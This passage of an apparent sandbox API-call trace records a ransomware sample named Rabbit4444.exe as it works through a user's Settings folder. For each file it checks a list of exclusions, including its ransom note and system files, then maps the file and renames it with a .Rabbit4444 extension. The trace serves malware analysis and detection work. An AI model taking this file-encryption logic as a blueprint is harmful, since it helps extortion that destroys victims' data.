"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c3915cf9-a3d9-4efd-b209-62c05793ee0f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.454] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.454] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15076432964) returned 1 [0059.454] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=979) returned 1 [0059.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0059.454] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.455] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0059.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0059.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.456] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15076691378) returned 1 [0059.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.456] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0059.456] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.456] CloseHandle (hObject=0x298) returned 1 [0059.456] CloseHandle (hObject=0x278) returned 1 [0059.456] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms.Rabbit4444") returned 192 [0059.457] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c3915cf9-a3d9-4efd-b209-62c05793ee0f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c3915cf9-a3d9-4efd-b209-62c05793ee0f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.457] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55c87d2a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55c87d2a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22335dcf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", cAlternateFileName="CL3F05~1.SET")) returned 1 [0059.457] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.457] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.457] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.457] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2=".") returned 1 [0059.457] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="..") returned 1 [0059.457] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="windows") returned -1 [0059.458] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.458] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.458] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="boot") returned 1 [0059.458] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.458] lstrcmpiW (lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.458] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms" | out: lpString1="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms") returned="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms" [0059.458] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.458] lstrlenW (lpString="Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms") returned 64 [0059.458] lstrlenW (lpString="Rabbit4444") returned 10 [0059.458] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.458] lstrlenW (lpString=".dll") returned 4 [0059.458] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.458] lstrlenW (lpString=".lnk") returned 4 [0059.458] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.458] lstrlenW (lpString=".ini") returned 4 [0059.458] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.458] lstrlenW (lpString=".sys") returned 4 [0059.458] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.458] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c3f521c1-249f-48fd-9d9d-731ea4568776}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.459] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.459] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15076935513) returned 1 [0059.459] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1022) returned 1 [0059.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0059.459] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.460] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.461] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15077188219) returned 1 [0059.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.461] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0059.461] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.461] CloseHandle (hObject=0x298) returned 1 [0059.461] CloseHandle (hObject=0x278) returned 1 [0059.461] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms.Rabbit4444") returned 192 [0059.462] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c3f521c1-249f-48fd-9d9d-731ea4568776}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c3f521c1-249f-48fd-9d9d-731ea4568776}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.462] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55d206ac, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55d206ac, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", cAlternateFileName="CL7513~1.SET")) returned 1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2=".") returned 1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="..") returned 1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="windows") returned -1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="boot") returned 1 [0059.462] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.463] lstrcmpiW (lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.463] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms" | out: lpString1="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms") returned="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms" [0059.463] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.463] lstrlenW (lpString="Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms") returned 64 [0059.463] lstrlenW (lpString="Rabbit4444") returned 10 [0059.463] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.463] lstrlenW (lpString=".dll") returned 4 [0059.463] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.463] lstrlenW (lpString=".lnk") returned 4 [0059.463] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.463] lstrlenW (lpString=".ini") returned 4 [0059.463] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.463] lstrlenW (lpString=".sys") returned 4 [0059.463] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.463] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c5361e07-6aa3-4453-81bc-93e8f85eabed}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.463] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.463] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15077422121) returned 1 [0059.464] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=992) returned 1 [0059.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.464] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.464] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.465] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.466] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15077677516) returned 1 [0059.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.466] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.466] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.466] CloseHandle (hObject=0x298) returned 1 [0059.466] CloseHandle (hObject=0x278) returned 1 [0059.466] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms.Rabbit4444") returned 192 [0059.466] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c5361e07-6aa3-4453-81bc-93e8f85eabed}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c5361e07-6aa3-4453-81bc-93e8f85eabed}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.467] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55db902d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55db902d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", cAlternateFileName="CL4DB5~1.SET")) returned 1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2=".") returned 1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="..") returned 1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="windows") returned -1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="boot") returned 1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.467] lstrcmpiW (lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.467] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms" | out: lpString1="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms") returned="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms" [0059.468] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.468] lstrlenW (lpString="Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms") returned 64 [0059.468] lstrlenW (lpString="Rabbit4444") returned 10 [0059.468] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.468] lstrlenW (lpString=".dll") returned 4 [0059.468] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.468] lstrlenW (lpString=".lnk") returned 4 [0059.468] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.468] lstrlenW (lpString=".ini") returned 4 [0059.468] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.468] lstrlenW (lpString=".sys") returned 4 [0059.468] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.468] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.468] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.468] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15077915067) returned 1 [0059.468] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=826) returned 1 [0059.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0059.469] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0059.470] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0059.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.471] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.471] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.471] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.471] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.471] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.471] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15078188681) returned 1 [0059.471] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.471] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0059.471] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.471] CloseHandle (hObject=0x298) returned 1 [0059.471] CloseHandle (hObject=0x278) returned 1 [0059.471] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms.Rabbit4444") returned 192 [0059.471] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms.Rabbit4444" (normalized: 